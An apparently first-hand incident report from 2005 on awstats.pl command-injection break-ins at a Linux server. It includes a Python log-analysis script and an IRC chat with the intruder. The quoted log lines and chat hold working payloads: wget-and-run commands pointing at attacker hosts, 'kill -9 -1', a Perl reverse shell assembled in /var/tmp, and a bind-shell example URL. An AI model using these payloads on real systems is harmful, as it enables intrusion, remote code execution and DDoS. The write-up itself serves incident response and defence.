On March 2nd, 2005, a server for which I am responsible received its first attempted break-in via awstats:
163.19.XX.YY - - [02/Mar/2005:14:46:53 -0600] "GET //cgi/awstats.pl?configdir=| id | HTTP/1.1" 404 404 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

This machine is in Taiwan.

This scouting effort may have been connected with the next attempt:

64.49.XX.YY - - [07/Mar/2005:01:20:12 -0600] "GET /awstats/awstats.pl?configdir=|echo ;cd /tmp;wget vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f57;perl sess_3539283e27d73cae29fe2b80f9293f57;echo ;echo| HTTP/1.1" 404 407 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.49.XX.YY - - [07/Mar/2005:01:20:08 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo ;cd /tmp;wget vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f57;perl sess_3539283e27d73cae29fe2b80f9293f57;echo ;echo| HTTP/1.1" 200 553 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.51.188.2 - - [07/Mar/2005:10:54:47 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo ;cd /tmp;wget http://vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f58;perl sess_3539283e27d73cae29fe2b80f9293f58;echo ;echo| HTTP/1.1" 200 560 "-" "-"
64.51.188.2 - - [07/Mar/2005:11:32:17 -0600] "GET /awstats/awstats.pl?configdir=|echo ;cd /tmp;wget http://vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f58;perl sess_3539283e27d73cae29fe2b80f9293f58;echo ;echo| HTTP/1.1" 404 407 "-" "-"
59.120.XX.YY - - [09/Mar/2005:11:03:16 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo ;cd /tmp;wget vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f59;perl sess_3539283e27d73cae29fe2b80f9293f59;echo ;echo| HTTP/1.1" 200 553 "-" "-"
59.120.XX.YY - - [09/Mar/2005:12:09:17 -0600] "GET /awstats/awstats.pl?configdir=|echo ;cd /tmp;wget vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f59;perl sess_3539283e27d73cae29fe2b80f9293f59;echo ;echo| HTTP/1.1" 404 407 "-" "-"

The 64.51.XX.YY address is a corporation located in Libertyville, IL, but the 59.120.XX.YY address is located in Taiwan, just like the machine which scanned me on 3/2/05. I believe it is safe to assume that these bad guys are the same group of people.

Note that this was actually successful, in that they managed to download code to my server. The script they downloaded is "shellbot", apparently written by OldW0lf. The repeated attempts to install this are interesting, and were unexplained to me until later in this incident.
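The log lines above are the whole record of the break-in, so a small parser that flags awstats configdir injection attempts and separates scouting from payload delivery is the check I would run over the access_log. This is an added example, not code from the original write-up; the log lines inside it are constructed to mirror the ones shown (masked IPs, a placeholder attacker.example host and a placeholder /var/tmp/.stage path).

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines modelled on the incident's access_log entries.
SAMPLE_LOG = r'''163.19.XX.YY - - [02/Mar/2005:14:46:53 -0600] "GET //cgi/awstats.pl?configdir=| id | HTTP/1.1" 404 404 "-" "Mozilla/4.0"
64.49.XX.YY - - [07/Mar/2005:01:20:08 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo ;cd /tmp;wget attacker.example/sess_x;perl sess_x;echo ;echo| HTTP/1.1" 200 553 "-" "-"
62.193.XX.YY - - [12/Mar/2005:04:37:00 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo;echo+DTORS_START;uname -a;echo+DTORS_STOP;echo| " 200 605 "-" "-"
62.249.XX.YY - - [13/Mar/2005:09:42:15 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo x >/var/tmp/.stage| HTTP/1.1" 200 716 "-" "Mozilla/4.0"
10.0.0.5 - - [13/Mar/2005:09:50:00 -0600] "GET /cgi-bin/awstats.pl?config=site&output=main HTTP/1.1" 200 3115 "-" "Mozilla/4.0"
'''

# Apache combined log format. The request target is matched lazily because the
# injected payload may itself contain quotes, and some entries in this incident
# carry no "HTTP/x.y" suffix at all.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>.*?)'
    r'(?: HTTP/[\d.]+)?" (?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')

# A pipe right after configdir= is the awstats command injection signature.
INJECT_RE = re.compile(r'configdir=\s*\|')

# Coarse classification of what the injected shell pipeline tries to do.
STAGES = [
    ("recon", re.compile(r'\b(?:id|w|uname|ps)\b')),
    ("download", re.compile(r'\b(?:wget|curl|lwp-download|fetch)\b')),
    ("execute", re.compile(r'\b(?:perl|sh|chmod|exec)\b')),
    ("write_file", re.compile(r'>>?\s*/')),
]


def analyse(log_text):
    """Return one finding dict per awstats configdir injection attempt."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Decode %XX and '+' so "echo+DTORS_START" and %7C variants are visible.
        target = unquote_plus(m["target"])
        if not INJECT_RE.search(target):
            continue
        payload = target.split("configdir=", 1)[1]
        stages = [name for name, rx in STAGES if rx.search(payload)]
        findings.append({
            "ip": m["ip"],
            "time": m["ts"],
            "path": target.split("?", 1)[0],
            "status": int(m["status"]),
            "stages": stages or ["probe"],
            # A 200 means awstats.pl existed at that path and ran, so the
            # pipeline almost certainly executed as the web server user.
            "likely_executed": m["status"] == "200",
        })
    return findings


def summarize(findings):
    """Per-source view: attempts, how many got a 200, and the stages seen."""
    by_ip = {}
    for f in findings:
        d = by_ip.setdefault(f["ip"], {"attempts": 0, "executed": 0, "stages": set()})
        d["attempts"] += 1
        d["executed"] += int(f["likely_executed"])
        d["stages"].update(f["stages"])
    return by_ip


if __name__ == "__main__":
    for ip, d in summarize(analyse(SAMPLE_LOG)).items():
        print(ip, d["attempts"], "attempts,", d["executed"], "executed:", sorted(d["stages"]))
```

A 404 against a given path only means that path did not exist; the same source usually retries the other paths, so the per-source summary is the view that shows whether any attempt landed.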

One interesting side effect of this exploit is that the perl code in /var/log/httpd/access_log and /var/log/httpd/error_log confused one of the processes on this machine, a Mandrake 10.0 Official box. The process was /usr/sbin/advxsplitlogfile. This confusion was manifested by that script failing to complete in its normally allotted time. I noticed this, but was so busy with other projects that I simply manually killed it, and went on to fry bigger fish.

On March 10th came the next attempt:

206.61.XX.YY - - [10/Mar/2005:00:02:45 -0600] "GET //cgi-bin/awstats/awstats.pl?configdir=| id | HTTP/1.1" 404 416 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
206.61.XX.YY - - [10/Mar/2005:00:02:45 -0600] "GET //cgi-bin/awstats.pl?configdir=| id | HTTP/1.1" 200 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
206.61.XX.YY - - [10/Mar/2005:00:02:51 -0600] "GET //cgi/awstats.pl?configdir=| id | HTTP/1.1" 404 404 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
206.61.XX.YY - - [10/Mar/2005:00:02:51 -0600] "GET //cp/awstats/awstats.pl?configdir=| id | HTTP/1.1" 404 411 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
206.61.XX.YY - - [10/Mar/2005:00:02:51 -0600] "GET //stat-cgi/awstats.pl?configdir=| id | HTTP/1.1" 404 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
206.61.XX.YY - - [10/Mar/2005:00:02:51 -0600] "GET //awstats/awstats.pl?configdir=| id | HTTP/1.1" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
206.61.XX.YY - - [10/Mar/2005:00:02:51 -0600] "GET //awstats/perl/awstats.pl?configdir=| id | HTTP/1.1" 404 413 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
206.61.XX.YY - - [10/Mar/2005:00:02:51 -0600] "GET //awstats/awstats.pl?configdir=| id | HTTP/1.1" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

This is a machine in Raleigh, NC.

212.88.XX.YY - - [10/Mar/2005:03:32:35 -0600] "GET /awstats/awstats.pl?configdir=|echo ;echo b_exp;kill -9 -1;echo e_exp;%00 HTTP/1.1" 404 407 "-" "-"
212.88.XX.YY - - [10/Mar/2005:03:32:35 -0600] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo ;echo b_exp;kill -9 -1;echo e_exp;%00 HTTP/1.1" 404 415 "-" "-"
212.88.XX.YY - - [10/Mar/2005:03:32:38 -0600] "GET /awstats/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;wget checkingwamu.com/https;perl https;rm -rf http*;ps xc;echo e_exp;%00 HTTP/1.1" 404 407 "-" "-"
212.88.XX.YY - - [10/Mar/2005:03:32:38 -0600] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo ;echo b_exp;w;id;cd /tmp;wget checkingwamu.com/https;perl https;rm -rf http*;ps xc;echo e_exp;%00 HTTP/1.1" 404 415 "-" "-"
212.88.XX.YY - - [10/Mar/2005:03:32:36 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;uname -a;id;echo Instalam bot in /tmp;cd /tmp;wget checkingwamu.com/https;perl https;echo Done;echo e_exp;%00 HTTP/1.1" 200 742 "-" "-"

This machine is located in Austria, but I believe this is a THIRD group of crackers working to gain this machine. The script which I downloaded from checkingwamu.com is a renamed version of "testscript", referenced at https://www.redhat.com/archives/fedora-list/2005-March/msg00516.html . Despite my efforts, I was unable to connect to the IRC channel listed in this script: #xhack (with password cloused), using nick `zup, ircname "clown", realname "screw", and connecting to the server eu.undernet.org. I am rather unfamiliar with IRC, however, so this is most likely a newbie-ish issue.

Note that checkingwamu.com is located in California.

Next, a site in Britain scanned me:

62.193.XX.YY - - [12/Mar/2005:04:36:48 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo;echo+DTORS_START;id;echo+DTORS_STOP;echo| " 200 546 "-" "-"
62.193.XX.YY - - [12/Mar/2005:04:36:52 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo;echo+DTORS_START;w;echo+DTORS_STOP;echo| " 200 781 "-" "-"
62.193.XX.YY - - [12/Mar/2005:04:37:00 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo;echo+DTORS_START;uname -a;echo+DTORS_STOP;echo| " 200 605 "-" "-"

The final incident happened on 13/Mar/2005:

216.145.XX.YY - - [13/Mar/2005:00:47:35 -0600] "GET //cgi-bin/awstats/awstats.pl HTTP/1.1" 404 416 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.145.XX.YY - - [13/Mar/2005:00:47:35 -0600] "GET //cgi-bin/awstats.pl HTTP/1.1" 200 3113 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.145.XX.YY - - [13/Mar/2005:00:47:37 -0600] "GET //cgi/awstats.pl HTTP/1.1" 404 404 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.145.XX.YY - - [13/Mar/2005:00:47:37 -0600] "GET //stat-cgi/awstats.pl HTTP/1.1" 404 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.145.XX.YY - - [13/Mar/2005:00:47:37 -0600] "GET //cp/awstats/awstats.pl HTTP/1.1" 404 411 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.145.XX.YY - - [13/Mar/2005:00:47:37 -0600] "GET //awstats/perl/awstats.pl HTTP/1.1" 404 413 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.145.XX.YY - - [13/Mar/2005:00:47:38 -0600] "GET //stat-cgi/awstats.pl HTTP/1.1" 404 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.145.XX.YY - - [13/Mar/2005:00:47:38 -0600] "GET //awstats/awstats.pl HTTP/1.1" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

216.145.XX.YY identifies itself as a domain name which is apparently not registered.

62.249.XX.YY - - [13/Mar/2005:09:42:12 -0600] "GET /cgi-bin/awstats.pl HTTP/1.0" 200 3115 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d"
62.249.XX.YY - - [13/Mar/2005:09:42:15 -0600] "GET /cgi-bin/awstats.pl?configdir=|perl -e "print \"#!/usr/bin/perl[LF]use Socket; use IO::Handle; use POSIX; $proto = getprotobyname('tcp');\"" >/var/tmp/.vetx.95| HTTP/1.1" 200 716 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Avant Browser [avantbrowser.com]; MyIE2; .NET CLR 1.1.4322)"
62.249.XX.YY - - [13/Mar/2005:09:42:18 -0600] "GET /cgi-bin/awstats.pl?configdir=|perl -e "print \" socket(Socket_Handle, AF_INET, SOCK_STREAM, $proto); $sin = sockaddr_in(31302,inet_at\"" >>/var/tmp/.vetx.95| HTTP/1.1" 200 717 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Avant Browser [avantbrowser.com]; MyIE2; .NET CLR 1.1.4322)"
62.249.XX.YY - - [13/Mar/2005:09:42:20 -0600] "GET /cgi-bin/awstats.pl?configdir=|perl -e "print \"on("62.249.XX.YY" )); connect(Socket_Handle,$sin); dup2(Socket_Handle->fileno, 0); d\"" >>/var/tmp/.vetx.95| HTTP/1.1" 200 717 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Avant Browser [avantbrowser.com]; MyIE2; .NET CLR 1.1.4322)"
62.249.XX.YY - - [13/Mar/2005:09:42:21 -0600] "GET /cgi-bin/awstats.pl?configdir=|perl -e "print \"up2(Socket_Handle->fileno, 1); dup2(Socket_Handle->fileno, 2); exec { "/bin/sh" } "";[LF]\"" >>/var/tmp/.vetx.95| HTTP/1.1" 200 717 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Avant Browser [avantbrowser.com]; MyIE2; .NET CLR 1.1.4322)"
62.249.XX.YY - - [13/Mar/2005:09:42:23 -0600] "GET /cgi-bin/awstats.pl?configdir=|chmod 755 /var/tmp/.vetx.95| HTTP/1.1" 200 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Avant Browser [avantbrowser.com]; MyIE2; .NET CLR 1.1.4322)"
62.249.XX.YY - - [13/Mar/2005:09:42:28 -0600] "GET /cgi-bin/awstats.pl?configdir=|rm -f /var/tmp/.vetx.95| HTTP/1.1" 200 356 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Avant Browser [avantbrowser.com]; MyIE2; .NET CLR 1.1.4322)"
62.249.XX.YY - - [13/Mar/2005:09:42:25 -0600] "GET /cgi-bin/awstats.pl?configdir=|exec /var/tmp/.vetx.95| HTTP/1.1" 200 355 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Avant Browser [avantbrowser.com]; MyIE2; .NET CLR 1.1.4322)"

62.249.XX.YY is a machine in Norway.

At the same time that this attempt partially succeeded, my route went south, and stopped responding to the world. This is a wonderful happenstance, since it alerted me to the problem. I spotted a process named "s" running as Apache. I then ran my normal backup process (so I would have an image of the compromised machine), and began going through the box to see how far they had gotten.

The bad news is that I was up-to-date on awstats updates from Mandrake, and I was still vulnerable. They have been alerted.

I did a find on 's', and it turned up a new directory: /var/tmp/.cache. This directory had the following files:

-rwxr-xr-x  1 apache apache 433332 Mar 13 10:12 0*
-rwxr-xr-x  1 apache apache    147 Jul 29  2004 clear.sh*
-rw-r--r--  1 apache apache    253 Mar 14 08:22 ftp
-rw-r--r--  1 apache apache      0 Mar 14 08:22 Garion.seen
-rwxr-xr-x  1 apache apache 160867 Mar 21  2005 httpd*
-rwxr-xr-x  1 apache apache  24747 Mar 13 10:12 j*
-rwxr-xr-x  1 apache apache  31757 Mar 13 10:12 k*
-rw-r--r--  1 apache apache  22983 Jul 29  2004 mech.help
-rw-r--r--  1 apache apache   1064 Mar 14 08:22 mech.levels
-rw-r--r--  1 apache apache   6734 Mar 13 10:12 mech.pid
-rw-r--r--  1 apache apache    522 Mar 14 08:22 mech.session
-rw-r--r--  1 apache apache    827 Mar 21  2005 mech.set
-rwxr-xr-x  1 apache apache  22158 Mar 13 09:42 s*
-rwxr-xr-x  1 apache apache     61 Mar 21  2005 start.sh*
-rwxr-xr-x  1 apache apache  22446 Mar 13 10:12 v1*
-rwxr-xr-x  1 apache apache  23414 Mar 13 10:12 v2*
-rwxr-xr-x  1 apache apache  26958 Mar 13 10:12 x*

Looking through the energymech settings, I decided to try to connect to the channel. I did! And lo and behold, the hacker was chatty.

Here is the log of the chat:

### Log session started at Mon Mar 14 15:10:19 2005 ###
[15:10:39] |Garion| [~kvirc@earwig.SOMECLIENT.ORG] is now known as IronBar
[15:10:47] <@darks> so
[15:10:53] <@darks> what isp do u work for m8 ?
[15:11:03] <+IronBar> private consultant.
[15:11:12] <@darks> ohh
[15:11:17] <@darks> that's cool
[15:11:24] <@darks> for who ?
[15:11:35] <+IronBar> primarily me.
[15:11:46] <+IronBar> "have keyboard, will travel"
[15:11:46] <@darks> are u upset I fucked the box ?
[15:11:49] IronBar shrugs
[15:12:12] <@darks> I stole the bot from another dude
[15:12:14] <@darks> sorry
[15:12:18] <+IronBar> I think "f'd" is a generous summary of a breakin which didn't include privilege elevation
[15:12:19] <@darks> so it wasn't me who was 1st in it.
[15:12:43] <+IronBar> The penalties for something like this are big, man.
[15:12:59] <@darks> ahh
[15:13:01] <+IronBar> right now, I'm just curious about the "s" program.
[15:13:04] <@darks> for you, you mean ?
[15:13:12] <+IronBar> in your rootkit.
[15:13:19] <@darks> that's not a rootkit
[15:13:21] <@darks> it's a bot
[15:13:22] <@darks> emech
[15:13:25] <+IronBar> aha.
[15:13:28] <@darks> www.energymech.net
[15:13:34] <+IronBar> interesting.
[15:13:34] <@darks> ./s - stealth
[15:13:38] <@darks> it's a ddos program
[15:14:06] <@darks> ./s IP port
[15:14:08] <+IronBar> ja, I found a few in there.  and some priv elevators.
[15:14:10] <+IronBar> gotcha.
[15:14:11] <@darks> and it sends udp packets to it
[15:14:26] <@darks> I made the bots yesterday
[15:14:32] <@darks> didn't use them much
[15:14:42] <@darks> but another dude got the box also
[15:14:43] <@darks> .keep
[15:14:45] <@darks> I think is his dir
[15:14:49] <@darks> look in /var/tmp
[15:14:51] <@darks> u will see
[15:14:54] <+IronBar> empty.
[15:14:58] <@darks> hmm
[15:15:02] <@darks> well, u erased it ?
[15:15:06] <+IronBar> nope.
[15:15:09] <@darks> ls -la
[15:15:10] <@darks> m8
[15:15:11] <@darks> not ls
[15:15:13] <@darks> ls -la
[15:15:14] <@darks> it's a .
[15:15:16] <@darks> dir
[15:15:17] <@darks> .keep
[15:15:27] <+IronBar> only .cache in /var/tmp
[15:15:41] <@darks> ohh
[15:15:47] <@darks> then it means you removed him from before
[15:15:54] <@darks> but u did not figure out how he got in
[15:16:01] <+IronBar> awstats.pl
[15:16:07] <@darks> yea
[15:16:15] <+IronBar> Popular exploit these days.
[15:16:24] <@darks> yea, it wasn't when I got hold of it
[15:16:30] <@darks> i owned like 200 root@ boxes
[15:16:34] <@darks> and now I steal from suckers
[15:16:53] <@darks> but I mean, I could have killed ur box
[15:17:04] <+IronBar> no, you couldn't have.
[15:17:04] <@darks> Linux earwig.SOMECLIENT.ORG 2.6.3-7mdk #1 Wed Mar 17 15:56:42 CET 2004 i686 AMD Athlon(tm) XP 2000
[15:17:08] <@darks> wanna bet ?
[15:17:13] <+IronBar> hrm.
[15:17:25] <@darks> it's pretty simple m8
[15:17:27] <@darks> forkbomb it
[15:17:30] <@darks> and it reboots
[15:17:39] <@darks> anyway, it still works to get in
[15:17:47] <+IronBar> What still works to get in?
[15:17:56] <@darks> awstats.pl
[15:18:01] <+IronBar> try it.
[15:18:05] <@darks> ok
[15:18:16] <@darks> root     vc/1      09:27    3:45m  2.17s  0.69s tail -f /var/log/messages
[15:18:17] <@darks> jeremy   pts/0     10:31   30.00s  0.50s  0.02s sshd: jeremy [priv]
[15:18:17] <@darks> mschwarz pts/2     14:21   56:29   0.50s  0.48s top
[15:18:22] <@darks> uid=72(apache) gid=72(apache) groups=72(apache)
[15:18:24] <@darks> ?
[15:18:25] <+IronBar> very good!
[15:18:35] <@darks> oh well, u just need to update m8
[15:18:41] <@darks> I think u try to gather logs
[15:18:45] <@darks> that's not my real IP
[15:18:46] <@darks> :)
[15:18:57] <@darks> stop thinking u are smarter for 1 second.
[15:19:26] <@darks> it's a perl reverse shell
[15:19:31] <@darks> if u're so interested
[15:19:35] <+IronBar> I am.
[15:19:37] <@darks> just remove or update awstats.pl
[15:19:42] <@darks> pretty easy
[15:19:44] <+IronBar> so you're constructing the shell, putting it in /var/tmp, and then executing it.
[15:19:45] <@darks> all it does
[15:19:48] <@darks> yea
[15:19:53] <@darks> that's what the perl does
[15:19:57] <@darks> xploit I mean
[15:20:01] <@darks> it's kinda unique
[15:20:06] <@darks> hence normal lamers do
[15:20:39] <@darks> http://victim/awstats/awstats.pl?confdir=|cd /var/tmp;wget shit.org/bind;chmod +x bind;./bind&|
[15:20:43] <@darks> that will open port 4000
[15:20:45] <@darks> but many 
[15:20:46] <@darks> are 
[15:20:50] <@darks> blocked from the outside
[15:20:52] <+IronBar> interesting.
[15:21:03] <@darks> anyway, mine tryes to connect back from inside
[15:21:07] <@darks> not many have that blocked
[15:21:08] <@darks> :)
[15:21:22] <@darks> so imagine I get 50% more boxes than them.
[15:21:45] <+IronBar> I'm not sure I follow...
[15:22:05] <@darks> the shell
[15:22:09] <@darks> connects back to my box
[15:22:12] <@darks> it's a reverse shell
[15:22:24] <@darks> most firewall aren't configured to block outgoing connections
[15:22:25] <@darks> :)
[15:22:31] <@darks> only 10%
[15:22:38] <@darks> they only block outside connections.
[15:22:45] <+IronBar> Your average NAT box wants to let inside connections out.
[15:23:00] <@darks> yea
[15:23:02] <@darks> all of them
[15:23:11] <@darks> I mean, u want to be able to connect to any host on any port
[15:23:28] <@darks> but for example
[15:23:33] <@darks> if I would have started a bind on it
[15:23:36] <@darks> on port 4000
[15:23:40] <@darks> I couldn't have connected to the box
[15:23:44] <@darks> since 4000 is closed at ur box.
[15:23:55] <@darks> u have only the necessary ports open
[15:24:02] <+IronBar> I do my best :/
[15:24:05] <@darks> 2.6.3
[15:24:10] <@darks> I think root@ works on that one
[15:24:12] <@darks> never tried
[15:24:15] <@darks> I suggest u get this
[15:24:25] <@darks> chkrootkit
[15:24:27] <@darks> or rkhunter
[15:24:31] <+IronBar> ja.  ran rkhunter
[15:24:32] <@darks> it's a 2000 box
[15:24:34] <@darks> as I see now
[15:24:40] <@darks> or not
[15:24:43] <@darks> the processor is xp
[15:24:44] <@darks> lol
[15:24:47] <@darks> ahtlon, sorry
[15:24:52] <+IronBar> no worries
[15:24:57] <@darks> I can try to get root
[15:24:59] <@darks> if u want
[15:25:02] <@darks> I have an exploit
[15:25:07] <@darks> that works on that
[15:25:36] <@darks> check ssh
[15:25:39] <@darks> for a backdoor
[15:25:43] <@darks> the md5 :)
[15:26:04] <+IronBar> md5sum checks out
[15:26:26] <@darks> then noone modified it
[15:26:32] IronBar nods
[15:26:41] <@darks> but I am pretty sure root@ works
[15:26:44] <@darks> can I try?
[15:26:51] <+IronBar> hold on  brb
[15:26:58] <@darks> ok
[15:30:38] <+IronBar> phone call.
[15:30:41] <+IronBar> off phone now.
[15:30:42] <@darks> ok
[15:30:46] <@darks> ok
[15:30:51] <@darks> well, can I try to get root@ ?
[15:31:00] <+IronBar> how does it work?
[15:31:04] <+IronBar> buffer overflow in kernel?
[15:31:13] <@darks> yea, kinda
[15:31:16] <+IronBar> give me a few moments before you try it.
[15:31:20] <@darks> ok
[15:31:32] <+IronBar> that machine is in the middle of updating something, and I want it in a known state first.
[15:31:56] <@darks> ahh
[15:31:58] <@darks> ok m8
[15:32:05] <@darks> u are on the machine
[15:32:11] IronBar nods
[15:34:51] darks is darks!~lightb@thunder.users.undernet.org
[15:34:51] darks's real name: G.T.
[15:34:51] darks's channels: @#ircblows, @#spys, @#ahley, @#thesecret
[15:34:51] darks's server: *.undernet.org - The Undernet Underworld
[15:34:51] darks's info: is logged in as
[15:34:51] darks WHOIS info from graz.at.Eu.UnderNet.org
[15:36:42] drunkb is drunkb!~lightb@drunkagain.org
[15:36:42] drunkb's real name: lightb
[15:36:42] drunkb's channels: @#thesecret
[15:36:42] drunkb's server: *.undernet.org - The Undernet Underworld
[15:36:42] drunkb WHOIS info from graz.at.Eu.UnderNet.org
[15:36:56] IronBar is IronBar!~kvirc@earwig.SOMECLIENT.ORG
[15:36:56] IronBar's real name: Using KVIrc 3.2.0 'Realia'
[15:36:56] IronBar's channels: +#thesecret
[15:36:56] IronBar's server: graz.at.Eu.UnderNet.org - TU-Graz, Austria
[15:36:56] IronBar's idle time: 0d 0h 4m 45s
[15:36:56] IronBar's signon time: Mon Mar 14 12:16:01 2005
[15:36:56] IronBar WHOIS info from graz.at.Eu.UnderNet.org
[15:37:07] <@darks> k
[15:37:12] <@darks> let me know when u are ready
[15:37:14] <@darks> meanwhile
[15:37:18] <@darks> what connection do u have?
[15:37:20] <@darks> not a good one, I think
[15:37:23] <+IronBar> it'll be a bit.
[15:37:25] <@darks> if u found me so fast.
[15:37:30] <+IronBar> ?
[15:37:34] <+IronBar> why do you say?
[15:37:38] <@darks> well, I packet from this nac box
[15:37:41] <@darks> for 2 weeks now
[15:37:45] <@darks> noone noticed.
[15:37:50] <@darks> and 24 hour ddoses
[15:37:54] <@darks> not 5 mins.
[15:38:18] <+IronBar> I don't understand why you say I have a bad connection?
[15:40:22] <@darks> u noticed
[15:40:24] <@darks> the ddos fast
[15:40:24] <@darks> :)
[15:40:33] <+IronBar> ah.  
[15:40:35] IronBar shrugs
[15:40:35] <@darks> fe
[15:40:37] <@darks> that's
[15:40:40] <@darks> 155Mbit
[15:40:45] <@darks> and u are 2 hops lower
[15:40:49] <@darks> so u have a t1 ?
[15:40:56] <+IronBar> not sure what this site has
[15:41:16] <@darks> well, it's a t1
[15:41:25] <@darks> 11  64.122.229.17 (64.122.229.17)  358.752 ms  366.397 ms  366.876 ms
[15:41:26] <@darks> very slow
[15:41:27] <@darks> wtf
[15:41:31] <@darks> are u downloading ?
[15:41:41] <+IronBar> xferring files to site2
[15:42:09] <@darks> well, that's why
[15:42:41] <@darks> it's ok anyway
[15:42:46] <@darks> i don't harm the boxes
[15:42:49] <@darks> I just packet from them
[15:42:53] <@darks> yesterday I made 80 bots
[15:42:57] <@darks> i got pissed on this dude
[15:43:00] <@darks> lame motherfucker
[15:43:06] <@darks> 4 hours and I was done, then i owned his ass.
[15:43:11] <@darks> I don't usually packet
[15:44:54] <+IronBar> brb
[16:29:18] <@darks> Garion__ -nick jesskitty
[16:29:19] Garion__ [~garion@64.224.10.49] is now known as jesskitty
[16:29:25] <@darks> jesskitty -join #ircblows
[16:29:29] <@darks> jesskitty -away
[16:29:39] <@darks> jesskitty -away  I GOT GENITAL HERPES BOYS, LET ME HAVE IT.
[16:30:30] darks [~lightb@thunder.users.undernet.org] has set channel mode +stn
[17:01:14] darks [~lightb@thunder.users.undernet.org] has quit IRC: Ping timeout
[17:06:21] _darks [lightb@drittsekk.net] has joined #thesecret
### Log session terminated at Mon Mar 14 20:10:10 2005 ###

Analysis of the server shows that the cracker was never able to elevate privilege beyond that of user Apache. rkhunter declared the machine clean, and I promptly upgraded all necessary software. I've also removed unused software from that machine. Furthermore, I ran md5sum against all binaries and compared the result to a known good machine, and everything came up clean. There were no suspicious logfile entries, or gaps in the logfiles.

Overall, even though Mandrake has a reputation for being insecure, I'm fairly happy with the result--we had a hole, it was exploited, the bad guys never got control of the machine. Obviously, I'd be happiest if the hole had been fixed before it was cracked--particularly since this exploit has been known since January.